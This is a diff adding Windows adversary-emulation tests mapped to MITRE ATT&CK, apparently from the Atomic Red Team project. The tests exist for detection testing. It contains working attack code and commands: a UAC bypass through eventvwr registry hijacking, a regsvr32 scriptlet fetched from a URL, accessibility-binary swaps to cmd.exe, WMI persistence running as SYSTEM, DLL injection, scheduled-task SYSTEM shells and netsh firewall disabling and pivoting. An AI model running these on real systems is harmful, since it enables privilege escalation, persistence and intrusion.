$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
||||||
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk RegSvcsRegaAsmBypass.cs
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
||||||
|
|
||||||
|
[OR]
|
||||||
|
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
||||||
|
//Executes UnRegisterClass If you don't have permissions
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
||||||
|
|
||||||
|
//This calls the UnregisterClass Method
|
||||||
|
*/
|
||||||
|
namespace regsvcser
|
||||||
|
{
|
||||||
|
|
||||||
|
public class Bypass : ServicedComponent
|
||||||
|
{
|
||||||
|
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
|
||||||
|
|
||||||
|
[ComRegisterFunction] //This executes if registration is successful
|
||||||
|
public static void RegisterClass ( string key )
|
||||||
|
{
|
||||||
|
Console.WriteLine("I shouldn't really execute");
|
||||||
|
}
|
||||||
|
|
||||||
|
[ComUnregisterFunction] //This executes if registration fails
|
||||||
|
public static void UnRegisterClass ( string key )
|
||||||
|
{
|
||||||
|
Console.WriteLine("I shouldn't really execute either.");
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
|
@ -0,0 +1,23 @@
|
||||||
|
<?XML version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
<registration
|
||||||
|
progid="PoC"
|
||||||
|
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||||
|
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
|
||||||
|
|
||||||
|
<!-- .sct files when downloaded, are executed from a path like this -->
|
||||||
|
<!-- Please Note, file extenstion does not matter -->
|
||||||
|
<!-- Though, the name and extension are arbitary.. -->
|
||||||
|
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||||||
|
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||||||
|
<!-- You can either execute locally, or from a url -->
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
// calc.exe should launch, this could be any arbitrary code.
|
||||||
|
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
</registration>
|
||||||
|
</scriptlet>
|
|
@ -0,0 +1,92 @@
|
||||||
|
function Invoke-EventVwrBypass {
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
|
||||||
|
Bypasses UAC by performing an image hijack on the .msc file extension
|
||||||
|
Expected to work on Win7, 8.1 and Win10
|
||||||
|
|
||||||
|
Only tested on Windows 7 and Windows 10
|
||||||
|
|
||||||
|
Author: Matt Nelson (@enigma0x3)
|
||||||
|
License: BSD 3-Clause
|
||||||
|
Required Dependencies: None
|
||||||
|
Optional Dependencies: None
|
||||||
|
|
||||||
|
Source: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
|
||||||
|
|
||||||
|
.PARAMETER Command
|
||||||
|
|
||||||
|
Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc <encodedCommand>"
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
|
||||||
|
|
||||||
|
This will write out "Is Elevated: True" to C:\UACBypassTest.
|
||||||
|
|
||||||
|
#>
|
||||||
|
|
||||||
|
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
|
||||||
|
Param (
|
||||||
|
[Parameter(Mandatory = $True)]
|
||||||
|
[ValidateNotNullOrEmpty()]
|
||||||
|
[String]
|
||||||
|
$Command,
|
||||||
|
|
||||||
|
[Switch]
|
||||||
|
$Force
|
||||||
|
)
|
||||||
|
$ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
|
||||||
|
$SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
|
||||||
|
|
||||||
|
if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
|
||||||
|
"UAC is set to 'Always Notify'. This module does not bypass this setting."
|
||||||
|
exit
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
#Begin Execution
|
||||||
|
$mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
|
||||||
|
$Command = $pshome + '\' + $Command
|
||||||
|
#Add in the new registry entries to hijack the msc file
|
||||||
|
if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
|
||||||
|
New-Item $mscCommandPath -Force |
|
||||||
|
New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
|
||||||
|
}else{
|
||||||
|
Write-Warning "Key already exists, consider using -Force"
|
||||||
|
exit
|
||||||
|
}
|
||||||
|
|
||||||
|
if (Test-Path $mscCommandPath) {
|
||||||
|
Write-Verbose "Created registry entries to hijack the msc extension"
|
||||||
|
}else{
|
||||||
|
Write-Warning "Failed to create registry key, exiting"
|
||||||
|
exit
|
||||||
|
}
|
||||||
|
|
||||||
|
$EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
|
||||||
|
#Start Event Viewer
|
||||||
|
if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
|
||||||
|
$Process = Start-Process -FilePath $EventvwrPath -PassThru
|
||||||
|
Write-Verbose "Started eventvwr.exe"
|
||||||
|
}
|
||||||
|
|
||||||
|
#Sleep 5 seconds
|
||||||
|
Write-Verbose "Sleeping 5 seconds to trigger payload"
|
||||||
|
if (-not $PSBoundParameters['WhatIf']) {
|
||||||
|
Start-Sleep -Seconds 5
|
||||||
|
}
|
||||||
|
|
||||||
|
$mscfilePath = "HKCU:\Software\Classes\mscfile"
|
||||||
|
|
||||||
|
if (Test-Path $mscfilePath) {
|
||||||
|
#Remove the registry entry
|
||||||
|
Remove-Item $mscfilePath -Recurse -Force
|
||||||
|
Write-Verbose "Removed registry entries"
|
||||||
|
}
|
||||||
|
|
||||||
|
if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
|
||||||
|
Stop-Process -Id $Process.Id
|
||||||
|
Write-Verbose "Killed running eventvwr process"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
|
@ -0,0 +1,31 @@
|
||||||
|
## Accessibility Features
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1015](https://attack.mitre.org/wiki/Technique/T1015)
|
||||||
|
|
||||||
|
### osk.exe swap
|
||||||
|
|
||||||
|
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
|
||||||
|
|
||||||
|
### sethc.exe swap
|
||||||
|
|
||||||
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||||
|
|
||||||
|
### utilman.exe swap
|
||||||
|
|
||||||
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||||
|
|
||||||
|
### magnify.exe swap
|
||||||
|
|
||||||
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||||
|
|
||||||
|
### narrator.exe swap
|
||||||
|
|
||||||
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||||
|
|
||||||
|
### DisplaySwitch.exe swap
|
||||||
|
|
||||||
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||||
|
|
||||||
|
### AtBroker.exe swap
|
||||||
|
|
||||||
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AtBroker.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
|
@ -0,0 +1,24 @@
|
||||||
|
## AppInit DLLs
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1103](https://attack.mitre.org/wiki/Technique/T1103)
|
||||||
|
|
||||||
|
#### AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system:
|
||||||
|
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
|
||||||
|
|
||||||
|
#### LoadAppInit_DLLs (REG_DWORD) Globally enables or disables AppInit_DLLs.
|
||||||
|
|
||||||
|
0x0 – AppInit_DLLs are disabled.
|
||||||
|
|
||||||
|
0x1 – AppInit_DLLs are enabled.
|
||||||
|
|
||||||
|
#### AppInit_DLLs (REG_SZ) Space or comma delimited list of DLLs to load. The complete path to the DLL should be specified using Short Names.
|
||||||
|
|
||||||
|
C:\ PROGRA~1\WID288~1\MICROS~1.DLL
|
||||||
|
|
||||||
|
##### RequireSignedAppInit_DLLs (REG_DWORD) Only load code-signed DLLs. 0x0 – Load any DLLs.
|
||||||
|
|
||||||
|
0x1 – Load only code-signed DLLs.
|
||||||
|
|
||||||
|
## Test Script
|
||||||
|
|
||||||
|
[AppInitInject.reg](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AppInitInject.reg)
|
|
@ -0,0 +1,17 @@
|
||||||
|
## Application Shimming
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1138](https://attack.mitre.org/wiki/Technique/T1138)
|
||||||
|
|
||||||
|
#### Deploying a custom shim database to users requires the following actions:
|
||||||
|
|
||||||
|
##### 1.) Placing the custom shim database (*.sdb file) in a location to which the user’s computer has access (either locally or on the network)
|
||||||
|
|
||||||
|
##### 2.) Possibly calling the sdbinst.exe command-line utility to install the custom shim database locally.
|
||||||
|
|
||||||
|
##### 3.) Registry Modification - This is completed either manually or by an installation tool.
|
||||||
|
|
||||||
|
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
|
||||||
|
|
||||||
|
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB
|
||||||
|
|
||||||
|
#### Detecting the shim execution is difficult. We suggest detection of Shim Installation.
|
|
@ -0,0 +1,5 @@
|
||||||
|
## Authentication Package
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1131](https://attack.mitre.org/wiki/Technique/T1131)
|
||||||
|
|
||||||
|
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
|
|
@ -0,0 +1,13 @@
|
||||||
|
# Change Default File Association
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1042](https://attack.mitre.org/wiki/Technique/T1042)
|
||||||
|
|
||||||
|
## User file association preferences are stored under
|
||||||
|
|
||||||
|
[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
|
||||||
|
|
||||||
|
Changes to a user's preference will occur under this entry's subkeys.
|
||||||
|
|
||||||
|
## Change association with assoc.exe
|
||||||
|
|
||||||
|
cmd.exe assoc .wav="C:\Program Files\Windows Media Player\wmplayer.exe"
|
|
@ -0,0 +1,17 @@
|
||||||
|
# Component Object Model Hijacking
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122)
|
||||||
|
|
||||||
|
## The search order for locating COM Objects can be hijacked, causing unauthorized code to execute.
|
||||||
|
|
||||||
|
#### The presence of objects within
|
||||||
|
|
||||||
|
HKEY_CURRENT_USER\Software\Classes\CLSID\
|
||||||
|
|
||||||
|
#### May be anomalous and should be investigated since user objects will be loaded prior to machine objects in
|
||||||
|
|
||||||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
|
||||||
|
|
||||||
|
## Test Script
|
||||||
|
|
||||||
|
[COM Hijack Scripts](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/COMHijackScripts)
|
|
@ -0,0 +1,53 @@
|
||||||
|
# Netsh Helper DLL
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1128](https://attack.mitre.org/wiki/Technique/T1128)
|
||||||
|
|
||||||
|
## A DLL can be registered to be loaded each time netsh.exe is executed, or for certain events.
|
||||||
|
|
||||||
|
Netsh interacts with other operating system components using dynamic-link library (DLL) files. Each Netsh helper DLL provides an extensive set of features called a context, which is a group of commands specific to a networking component. For example, Dhcpmon.dll provides netsh the context and set of commands necessary to configure and manage DHCP servers.
|
||||||
|
|
||||||
|
## Attackers can register a netsh helper with this command
|
||||||
|
|
||||||
|
netsh.exe add helper C:\Path\file.dll
|
||||||
|
|
||||||
|
## The following registry key stores the paths to the helpers
|
||||||
|
|
||||||
|
HKLM\SOFTWARE\Microsoft\Netsh
|
||||||
|
|
||||||
|
## Additional Netsh.exe testing we recommend
|
||||||
|
|
||||||
|
### Firewall Control
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
netsh firewall set opmode [disable|enable]
|
||||||
|
|
||||||
|
### Netsh.exe Pivoting
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
|
||||||
|
|
||||||
|
Can also support v4tov6, v6tov6, and v6tov4
|
||||||
|
|
||||||
|
### Netsh.exe Sniffing
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
netsh trace start capture=yes overwrite=no tracefile=<FilePath.etl>
|
||||||
|
|
||||||
|
to stop:
|
||||||
|
|
||||||
|
netsh trace stop
|
||||||
|
|
||||||
|
### Netsh.exe Wireless backdoor
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
netsh wlan set hostednetwork mode=[allow\|disallow]
|
||||||
|
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent\|temporary
|
||||||
|
netsh wlan [start|stop] hostednetwork
|
||||||
|
|
||||||
|
Enables or disables hostednetwork service.
|
||||||
|
Complete hosted network setup for creating a wireless backdoor.
|
||||||
|
Starts or stops a wireless backdoor. See below to set it up.
|
|
@ -0,0 +1,9 @@
|
||||||
|
## Scheduled Task
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053)
|
||||||
|
|
||||||
|
### Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time
|
||||||
|
|
||||||
|
[Examples Of Creating Tasks](https://technet.microsoft.com/en-us/library/cc725744(v=ws.11).aspx#BKMK_create)
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,53 @@
|
||||||
|
## Windows Management Instrumentation Event Subscription
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084)
|
||||||
|
|
||||||
|
### Persistence
|
||||||
|
|
||||||
|
Example:
|
||||||
|
```powershell
|
||||||
|
#Run from an administrator powershell window
|
||||||
|
#Code references
|
||||||
|
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
|
||||||
|
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
|
||||||
|
|
||||||
|
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
|
||||||
|
EventNameSpace='root\CimV2';
|
||||||
|
QueryLanguage="WQL";
|
||||||
|
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
|
||||||
|
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
|
||||||
|
|
||||||
|
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
|
||||||
|
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
|
||||||
|
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
|
||||||
|
|
||||||
|
$FilterToConsumerArgs = @{
|
||||||
|
Filter = [Ref] $Filter
|
||||||
|
Consumer = [Ref] $Consumer
|
||||||
|
}
|
||||||
|
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
|
||||||
|
```
|
||||||
|
|
||||||
|
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
|
||||||
|
|
||||||
|
|
||||||
|
Cleanup:
|
||||||
|
```powershell
|
||||||
|
#Run from an administrator powershell window
|
||||||
|
#Code references
|
||||||
|
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
|
||||||
|
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
|
||||||
|
|
||||||
|
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
|
||||||
|
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
|
||||||
|
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
|
||||||
|
|
||||||
|
$FilterConsumerBindingToCleanup | Remove-WmiObject
|
||||||
|
$EventConsumerToCleanup | Remove-WmiObject
|
||||||
|
$EventFilterToCleanup | Remove-WmiObject
|
||||||
|
```
|
||||||
|
|
||||||
|
#### References
|
||||||
|
|
||||||
|
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
|
||||||
|
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
|
|
@ -0,0 +1,10 @@
|
||||||
|
# Bypass User Account Control
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122)
|
||||||
|
|
||||||
|
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed.
|
||||||
|
|
||||||
|
## Test Script
|
||||||
|
|
||||||
|
[UACBypass](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/UACBypass)
|
||||||
|
|
|
@ -0,0 +1,17 @@
|
||||||
|
## DLL Injection
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1055](https://attack.mitre.org/wiki/Technique/T1055)
|
||||||
|
|
||||||
|
Examples and code resource for [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution)
|
||||||
|
|
||||||
|
### PowerShell Invoke-ReflectivePEInjection
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-ReflectivePEInjection.ps1
|
||||||
|
|
||||||
|
### Powershell Invoke-DllInjection
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll
|
|
@ -0,0 +1,34 @@
|
||||||
|
## Scheduled Task
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053)
|
||||||
|
|
||||||
|
|
||||||
|
## at.exe
|
||||||
|
|
||||||
|
Note: deprecated in Windows 8+
|
||||||
|
|
||||||
|
### Privileged Escalation
|
||||||
|
|
||||||
|
This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system.
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
at 13:20 /interactive cmd
|
||||||
|
|
||||||
|
Example:
|
||||||
|
|
||||||
|
net use \\[computername|IP] /user:DOMAIN\username password
|
||||||
|
net time \\[computername|IP]
|
||||||
|
at \\[computername|IP] 13:20 c:\temp\evil.bat
|
||||||
|
|
||||||
|
## schtask.exe
|
||||||
|
|
||||||
|
### Launch Interactive cmd.exe
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
schtasks /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
|
|
@ -0,0 +1,40 @@
|
||||||
|
## MITRE ATT&CK Matrix - Windows
|
||||||
|
|
||||||
|
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|
||||||
|
|-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||||
|
| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
|
||||||
|
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||||
|
| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | Clipboard Data | Data Encrypted | Connection Proxy |
|
||||||
|
| Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||||
|
| Bootkit | Bypass User Account Control | Component Firmware | Credentials in Files | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
|
||||||
|
| [Change Default File Association](Persistence/Change_Default_file_association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Component Object Model Hijacking | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||||
|
| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Input Capture | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||||
|
| Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels |
|
||||||
|
| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query%20Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels |
|
||||||
|
| External Remote Services | Local Port Monitor | Deobfuscate/Decode Files or Information | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote%20System%20Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication |
|
||||||
|
| File System Permissions Weakness | New Service | Disabling Security Tools | | Security Software Discovery | Taint Shared Content | Rundll32 | Video Capture | | Multilayer Encryption |
|
||||||
|
| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System%20Information%20Discovery.md) | Third-party Software | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | | | Remote File Copy |
|
||||||
|
| Hypervisor | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | [File Deletion](Defense%20Evasion/File_deletion.md) | | System Network Configuration Discovery | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol |
|
||||||
|
| Local Port Monitor | Service Registry Permissions Weakness | File System Logical Offsets | | System Network Connections Discovery | Windows Remote Management | Service Execution | | | Standard Cryptographic Protocol |
|
||||||
|
| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System%20Owner-User%20Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol |
|
||||||
|
| Modify Existing Service | Web Shell | Indicator Blocking | | System Service Discovery | | Trusted Developer Utilities | | | Uncommonly Used Port |
|
||||||
|
| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Indicator Removal from Tools | | System Time Discovery | | [Windows Management Instrumentation](Execution/Windows%20Management%20Instrumentation.md) | | | Web Service |
|
||||||
|
| New Service | | [Indicator Removal on Host](Defense%20Evasion/Indicator%20Removal%20on%20Host.md) | | | | [Windows Remote Management](Lateral%20Movement/Windows%20Remote%20Management.md) | | | |
|
||||||
|
| Office Application Startup | | Install Root Certificate | | | | [Bitsadmin](Execution/Bitsadmin.md) | | | |
|
||||||
|
| Path Interception | | [InstallUtil](Execution/RegsvcsRegasm.md) | | | | | | | |
|
||||||
|
| Redundant Access | | Masquerading | | | | | | | |
|
||||||
|
| Registry Run Keys / Start Folder | | Modify Registry | | | | | | | |
|
||||||
|
| Scheduled Task | | NTFS Extended Attributes | | | | | | | |
|
||||||
|
| Security Support Provider | | Network Share Connection Removal | | | | | | | |
|
||||||
|
| Service Registry Permissions Weakness | | Obfuscated Files or Information | | | | | | | |
|
||||||
|
